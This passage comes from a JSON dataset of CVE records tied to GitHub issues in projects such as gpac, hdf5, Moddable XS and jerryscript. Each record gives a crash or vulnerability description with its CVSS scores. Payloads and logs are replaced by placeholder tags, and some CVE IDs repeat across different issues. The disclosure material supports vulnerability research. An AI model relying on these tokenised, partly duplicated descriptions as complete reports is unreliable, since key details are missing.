  76470. "Issue_Url_old": "https://github.com/LoicMarechal/libMeshb/issues/21",
  76471. "Issue_Url_new": "https://github.com/loicmarechal/libmeshb/issues/21",
  76472. "Repo_new": "loicmarechal/libmeshb",
  76473. "Issue_Created_At": "2022-01-07T01:08:36Z",
  76474. "description": "Buffer overflow when processing malformed mesh files. Hi folks, An interesting crash was found while fuzz testing of the mesh2poly binary which can be triggered via a malformed mesh file. Although the below malformed file only crashes the program as is, it could potentially be crafted further and create a security issue where these kinds of files would be able compromise the process's memory through taking advantage of affordances given by memory corruption. It's recommend to harden the code to prevent these kinds of bugs as it could greatly mitigate such this issue and even future bugs. APITAG (create file from scratch, no magic bytes necessary) APITAG debug log CODETAG",
  76475. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76476. "severity": "MEDIUM",
  76477. "baseScore": 6.5,
  76478. "impactScore": 3.6,
  76479. "exploitabilityScore": 2.8
  76480. },
  76481. {
  76482. "CVE_ID": "CVE-2021-46234",
  76483. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2023",
  76484. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2023",
  76485. "Repo_new": "gpac/gpac",
  76486. "Issue_Created_At": "2022-01-03T12:52:03Z",
  76487. "description": "Null Pointer Dereference in gf_node_unregister () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt ERRORTAG",
  76488. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76489. "severity": "MEDIUM",
  76490. "baseScore": 5.5,
  76491. "impactScore": 3.6,
  76492. "exploitabilityScore": 1.8
  76493. },
  76494. {
  76495. "CVE_ID": "CVE-2021-46236",
  76496. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2024",
  76497. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2024",
  76498. "Repo_new": "gpac/gpac",
  76499. "Issue_Created_At": "2022-01-03T12:56:20Z",
  76500. "description": "Null Pointer Dereference in gf_sg_vrml_field_pointer_del () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt ERRORTAG",
  76501. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76502. "severity": "MEDIUM",
  76503. "baseScore": 5.5,
  76504. "impactScore": 3.6,
  76505. "exploitabilityScore": 1.8
  76506. },
  76507. {
  76508. "CVE_ID": "CVE-2021-46237",
  76509. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2033",
  76510. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2033",
  76511. "Repo_new": "gpac/gpac",
  76512. "Issue_Created_At": "2022-01-05T09:17:46Z",
  76513. "description": "Untrusted pointer dereference in gf_node_unregister () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG FILETAG Result Segmentation fault. bt ERRORTAG",
  76514. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76515. "severity": "MEDIUM",
  76516. "baseScore": 5.5,
  76517. "impactScore": 3.6,
  76518. "exploitabilityScore": 1.8
  76519. },
  76520. {
  76521. "CVE_ID": "CVE-2021-46238",
  76522. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2027",
  76523. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2027",
  76524. "Repo_new": "gpac/gpac",
  76525. "Issue_Created_At": "2022-01-03T13:30:56Z",
  76526. "description": "stack overflow in gf_node_get_name () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
  76527. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76528. "severity": "MEDIUM",
  76529. "baseScore": 5.5,
  76530. "impactScore": 3.6,
  76531. "exploitabilityScore": 1.8
  76532. },
  76533. {
  76534. "CVE_ID": "CVE-2021-46239",
  76535. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2026",
  76536. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2026",
  76537. "Repo_new": "gpac/gpac",
  76538. "Issue_Created_At": "2022-01-03T13:18:56Z",
  76539. "description": "Invalid free in APITAG . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
  76540. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76541. "severity": "MEDIUM",
  76542. "baseScore": 5.5,
  76543. "impactScore": 3.6,
  76544. "exploitabilityScore": 1.8
  76545. },
  76546. {
  76547. "CVE_ID": "CVE-2021-46240",
  76548. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2028",
  76549. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2028",
  76550. "Repo_new": "gpac/gpac",
  76551. "Issue_Created_At": "2022-01-03T13:46:36Z",
  76552. "description": "Null Pointer Dereference in gf_dump_vrml_sffield () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
  76553. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76554. "severity": "MEDIUM",
  76555. "baseScore": 5.5,
  76556. "impactScore": 3.6,
  76557. "exploitabilityScore": 1.8
  76558. },
  76559. {
  76560. "CVE_ID": "CVE-2021-46242",
  76561. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1329",
  76562. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1329",
  76563. "Repo_new": "hdfgroup/hdf5",
  76564. "Issue_Created_At": "2021-12-25T14:17:45Z",
  76565. "description": "A heap use after free in in H5AC_unpin_entry. Version: APITAG System information APITAG command: APITAG FILETAG Result Segmentation fault ASAN ERRORTAG",
  76566. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76567. "severity": "HIGH",
  76568. "baseScore": 8.8,
  76569. "impactScore": 5.9,
  76570. "exploitabilityScore": 2.8
  76571. },
  76572. {
  76573. "CVE_ID": "CVE-2021-46243",
  76574. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1326",
  76575. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1326",
  76576. "Repo_new": "hdfgroup/hdf5",
  76577. "Issue_Created_At": "2021-12-25T12:26:04Z",
  76578. "description": "Untrusted Pointer Dereference in H5O__dtype_decode_helper () at PATHTAG Untrusted Pointer Dereference in H5O__dtype_decode_helper () at PATHTAG Version APITAG command: APITAG FILETAG Result Segmentation fault. bt ERRORTAG",
  76579. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76580. "severity": "MEDIUM",
  76581. "baseScore": 6.5,
  76582. "impactScore": 3.6,
  76583. "exploitabilityScore": 2.8
  76584. },
  76585. {
  76586. "CVE_ID": "CVE-2021-46244",
  76587. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1327",
  76588. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1327",
  76589. "Repo_new": "hdfgroup/hdf5",
  76590. "Issue_Created_At": "2021-12-25T13:30:58Z",
  76591. "description": "Divide By Zero in H5T__complete_copy () at PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG Result ERRORTAG bt ERRORTAG",
  76592. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76593. "severity": "MEDIUM",
  76594. "baseScore": 6.5,
  76595. "impactScore": 3.6,
  76596. "exploitabilityScore": 2.8
  76597. },
  76598. {
  76599. "CVE_ID": "CVE-2021-46255",
  76600. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/21",
  76601. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/21",
  76602. "Repo_new": "weng-xianhu/eyoucms",
  76603. "Issue_Created_At": "2022-01-07T05:45:28Z",
  76604. "description": "There is an arbitrary file deletion vulnerability in your code. \\ Author: yukidddd \\ Submit date: PATHTAG \\ Target: FILETAG \\ Version NUMBERTAG UTF8 SP NUMBERTAG URLTAG \\ APITAG to insufficient filtering of the parameter filename, it can cause any file to be deleted \\ APITAG FILETAG NUMBERTAG Now,content of the root folder of the website is like this,and we created a new FILETAG as a test FILETAG NUMBERTAG Then we log in as a normal user and send the following payload FILETAG CODETAG NUMBERTAG And now,the FILETAG file has been deleted FILETAG",
  76605. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  76606. "severity": "HIGH",
  76607. "baseScore": 8.1,
  76608. "impactScore": 5.2,
  76609. "exploitabilityScore": 2.8
  76610. },
  76611. {
  76612. "CVE_ID": "CVE-2021-46311",
  76613. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2038",
  76614. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2038",
  76615. "Repo_new": "gpac/gpac",
  76616. "Issue_Created_At": "2022-01-09T06:44:25Z",
  76617. "description": "Null Pointer Dereference in gf_sg_destroy_routes\uff08\uff09at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt ERRORTAG",
  76618. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76619. "severity": "MEDIUM",
  76620. "baseScore": 5.5,
  76621. "impactScore": 3.6,
  76622. "exploitabilityScore": 1.8
  76623. },
  76624. {
  76625. "CVE_ID": "CVE-2021-46313",
  76626. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2039",
  76627. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2039",
  76628. "Repo_new": "gpac/gpac",
  76629. "Issue_Created_At": "2022-01-09T07:07:05Z",
  76630. "description": "A segmentation fault in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
  76631. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76632. "severity": "MEDIUM",
  76633. "baseScore": 5.5,
  76634. "impactScore": 3.6,
  76635. "exploitabilityScore": 1.8
  76636. },
  76637. {
  76638. "CVE_ID": "CVE-2021-46322",
  76639. "Issue_Url_old": "https://github.com/svaarala/duktape/issues/2448",
  76640. "Issue_Url_new": "https://github.com/svaarala/duktape/issues/2448",
  76641. "Repo_new": "svaarala/duktape",
  76642. "Issue_Created_At": "2022-01-10T03:47:30Z",
  76643. "description": "An SEGV issue detected when compiled with UBSAN. Duktape revision Commit NUMBERTAG a1b NUMBERTAG ef URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG Execution without ASAN APITAG",
  76644. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76645. "severity": "MEDIUM",
  76646. "baseScore": 5.5,
  76647. "impactScore": 3.6,
  76648. "exploitabilityScore": 1.8
  76649. },
  76650. {
  76651. "CVE_ID": "CVE-2021-46323",
  76652. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2122",
  76653. "Issue_Url_new": "https://github.com/espruino/espruino/issues/2122",
  76654. "Repo_new": "espruino/espruino",
  76655. "Issue_Created_At": "2021-12-21T14:03:50Z",
  76656. "description": "SEGV APITAG in APITAG Espruino revision Commit NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76657. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76658. "severity": "MEDIUM",
  76659. "baseScore": 5.5,
  76660. "impactScore": 3.6,
  76661. "exploitabilityScore": 1.8
  76662. },
  76663. {
  76664. "CVE_ID": "CVE-2021-46324",
  76665. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2121",
  76666. "Issue_Url_new": "https://github.com/espruino/espruino/issues/2121",
  76667. "Repo_new": "espruino/espruino",
  76668. "Issue_Created_At": "2021-12-21T13:15:35Z",
  76669. "description": "Stack buffer overflow APITAG in APITAG Espruino revision Commit NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76670. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76671. "severity": "HIGH",
  76672. "baseScore": 7.8,
  76673. "impactScore": 5.9,
  76674. "exploitabilityScore": 1.8
  76675. },
  76676. {
  76677. "CVE_ID": "CVE-2021-46325",
  76678. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2114",
  76679. "Issue_Url_new": "https://github.com/espruino/espruino/issues/2114",
  76680. "Repo_new": "espruino/espruino",
  76681. "Issue_Created_At": "2021-12-15T08:17:55Z",
  76682. "description": "stack buffer overflow APITAG in vcbprintf. Espruino revision Commit NUMBERTAG a9f NUMBERTAG a0 URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76683. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76684. "severity": "HIGH",
  76685. "baseScore": 7.8,
  76686. "impactScore": 5.9,
  76687. "exploitabilityScore": 1.8
  76688. },
  76689. {
  76690. "CVE_ID": "CVE-2021-46326",
  76691. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/759",
  76692. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/759",
  76693. "Repo_new": "moddable-opensource/moddable",
  76694. "Issue_Created_At": "2021-12-28T09:45:33Z",
  76695. "description": "Heap buf overflow ( PATHTAG ) in __asan_memcpy. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output with ASAN ERRORTAG No ASAN Output APITAG",
  76696. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76697. "severity": "HIGH",
  76698. "baseScore": 7.8,
  76699. "impactScore": 5.9,
  76700. "exploitabilityScore": 1.8
  76701. },
  76702. {
  76703. "CVE_ID": "CVE-2021-46327",
  76704. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/766",
  76705. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/766",
  76706. "Repo_new": "moddable-opensource/moddable",
  76707. "Issue_Created_At": "2022-01-07T16:05:55Z",
  76708. "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
  76709. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76710. "severity": "MEDIUM",
  76711. "baseScore": 5.5,
  76712. "impactScore": 3.6,
  76713. "exploitabilityScore": 1.8
  76714. },
  76715. {
  76716. "CVE_ID": "CVE-2021-46328",
  76717. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/751",
  76718. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/751",
  76719. "Repo_new": "moddable-opensource/moddable",
  76720. "Issue_Created_At": "2021-12-14T02:49:38Z",
  76721. "description": "Heap buffer overflow in __libc_start_main. Moddable XS revision Commit: db8f NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76722. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76723. "severity": "HIGH",
  76724. "baseScore": 7.8,
  76725. "impactScore": 5.9,
  76726. "exploitabilityScore": 1.8
  76727. },
  76728. {
  76729. "CVE_ID": "CVE-2021-46329",
  76730. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/768",
  76731. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/768",
  76732. "Repo_new": "moddable-opensource/moddable",
  76733. "Issue_Created_At": "2022-01-07T16:08:53Z",
  76734. "description": "SEGV ( PATHTAG ) in _fini. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
  76735. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76736. "severity": "MEDIUM",
  76737. "baseScore": 5.5,
  76738. "impactScore": 3.6,
  76739. "exploitabilityScore": 1.8
  76740. },
  76741. {
  76742. "CVE_ID": "CVE-2021-46330",
  76743. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/774",
  76744. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/774",
  76745. "Repo_new": "moddable-opensource/moddable",
  76746. "Issue_Created_At": "2022-01-10T02:55:10Z",
  76747. "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
  76748. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76749. "severity": "MEDIUM",
  76750. "baseScore": 5.5,
  76751. "impactScore": 3.6,
  76752. "exploitabilityScore": 1.8
  76753. },
  76754. {
  76755. "CVE_ID": "CVE-2021-46331",
  76756. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/750",
  76757. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/750",
  76758. "Repo_new": "moddable-opensource/moddable",
  76759. "Issue_Created_At": "2021-12-14T02:18:16Z",
  76760. "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit: db8f NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76761. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76762. "severity": "MEDIUM",
  76763. "baseScore": 5.5,
  76764. "impactScore": 3.6,
  76765. "exploitabilityScore": 1.8
  76766. },
  76767. {
  76768. "CVE_ID": "CVE-2021-46332",
  76769. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/752",
  76770. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/752",
  76771. "Repo_new": "moddable-opensource/moddable",
  76772. "Issue_Created_At": "2021-12-15T05:06:41Z",
  76773. "description": "Heap buffer overflow PATHTAG in APITAG Moddable XS revision Commit: db8f NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76774. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76775. "severity": "HIGH",
  76776. "baseScore": 7.8,
  76777. "impactScore": 5.9,
  76778. "exploitabilityScore": 1.8
  76779. },
  76780. {
  76781. "CVE_ID": "CVE-2021-46332",
  76782. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/749",
  76783. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/749",
  76784. "Repo_new": "moddable-opensource/moddable",
  76785. "Issue_Created_At": "2021-12-13T06:51:03Z",
  76786. "description": "APITAG SEGV PATHTAG in APITAG Build environment operating system: ubuntu NUMBERTAG cimmit hash: APITAG compile command: APITAG test command: APITAG poc ERRORTAG description asan log ERRORTAG release crash CODETAG",
  76787. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76788. "severity": "HIGH",
  76789. "baseScore": 7.8,
  76790. "impactScore": 5.9,
  76791. "exploitabilityScore": 1.8
  76792. },
  76793. {
  76794. "CVE_ID": "CVE-2021-46333",
  76795. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/769",
  76796. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/769",
  76797. "Repo_new": "moddable-opensource/moddable",
  76798. "Issue_Created_At": "2022-01-07T16:10:20Z",
  76799. "description": "Negative size param ( PATHTAG ) in __asan_memmove. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG Execution & Output ERRORTAG No ASAN Output APITAG",
  76800. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76801. "severity": "MEDIUM",
  76802. "baseScore": 5.5,
  76803. "impactScore": 3.6,
  76804. "exploitabilityScore": 1.8
  76805. },
  76806. {
  76807. "CVE_ID": "CVE-2021-46334",
  76808. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/760",
  76809. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/760",
  76810. "Repo_new": "moddable-opensource/moddable",
  76811. "Issue_Created_At": "2021-12-28T10:22:58Z",
  76812. "description": "A weird stack overflow when compiled with ASAN. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output with ASAN ERRORTAG ` No ASAN Output ERRORTAG",
  76813. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76814. "severity": "HIGH",
  76815. "baseScore": 7.8,
  76816. "impactScore": 5.9,
  76817. "exploitabilityScore": 1.8
  76818. },
  76819. {
  76820. "CVE_ID": "CVE-2021-46335",
  76821. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/748",
  76822. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/748",
  76823. "Repo_new": "moddable-opensource/moddable",
  76824. "Issue_Created_At": "2021-12-13T06:47:02Z",
  76825. "description": "APITAG Null pointer dereference in APITAG Build environment operating system: ubuntu NUMBERTAG cimmit hash: APITAG compile command: APITAG test command: APITAG poc ERRORTAG asan log ERRORTAG release log CODETAG",
  76826. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76827. "severity": "MEDIUM",
  76828. "baseScore": 5.5,
  76829. "impactScore": 3.6,
  76830. "exploitabilityScore": 1.8
  76831. },
  76832. {
  76833. "CVE_ID": "CVE-2021-46335",
  76834. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/767",
  76835. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/767",
  76836. "Repo_new": "moddable-opensource/moddable",
  76837. "Issue_Created_At": "2022-01-07T16:07:28Z",
  76838. "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
  76839. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76840. "severity": "MEDIUM",
  76841. "baseScore": 5.5,
  76842. "impactScore": 3.6,
  76843. "exploitabilityScore": 1.8
  76844. },
  76845. {
  76846. "CVE_ID": "CVE-2021-46336",
  76847. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4927",
  76848. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4927",
  76849. "Repo_new": "jerryscript-project/jerryscript",
  76850. "Issue_Created_At": "2022-01-04T06:06:49Z",
  76851. "description": "Assertion 'opts & APITAG failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76852. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76853. "severity": "MEDIUM",
  76854. "baseScore": 5.5,
  76855. "impactScore": 3.6,
  76856. "exploitabilityScore": 1.8
  76857. },
  76858. {
  76859. "CVE_ID": "CVE-2021-46337",
  76860. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4930",
  76861. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4930",
  76862. "Repo_new": "jerryscript-project/jerryscript",
  76863. "Issue_Created_At": "2022-01-04T06:09:14Z",
  76864. "description": "Assertion 'page_p != NULL' failed at PATHTAG (parser_list_get NUMBERTAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76865. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76866. "severity": "MEDIUM",
  76867. "baseScore": 5.5,
  76868. "impactScore": 3.6,
  76869. "exploitabilityScore": 1.8
  76870. },
  76871. {
  76872. "CVE_ID": "CVE-2021-46338",
  76873. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4900",
  76874. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4900",
  76875. "Repo_new": "jerryscript-project/jerryscript",
  76876. "Issue_Created_At": "2021-12-13T08:54:30Z",
  76877. "description": "Assertion 'ecma_is_lexical_environment (object_p)' failed at ecma helpers.c (ecma_get_lex_env_type).. APITAG revision Commit NUMBERTAG bd6 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG ASAN closed Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  76878. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76879. "severity": "MEDIUM",
  76880. "baseScore": 5.5,
  76881. "impactScore": 3.6,
  76882. "exploitabilityScore": 1.8
  76883. },
  76884. {
  76885. "CVE_ID": "CVE-2021-46339",
  76886. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4935",
  76887. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4935",
  76888. "Repo_new": "jerryscript-project/jerryscript",
  76889. "Issue_Created_At": "2022-01-04T06:17:32Z",
  76890. "description": "Assertion 'lit_is_valid_cesu8_string (string_p, string_size)' failed at PATHTAG APITAG . APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case FILETAG Execution steps & Output ERRORTAG",
  76891. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76892. "severity": "MEDIUM",
  76893. "baseScore": 5.5,
  76894. "impactScore": 3.6,
  76895. "exploitabilityScore": 1.8
  76896. },
  76897. {
  76898. "CVE_ID": "CVE-2021-46340",
  76899. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4924",
  76900. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4924",
  76901. "Repo_new": "jerryscript-project/jerryscript",
  76902. "Issue_Created_At": "2022-01-04T06:04:22Z",
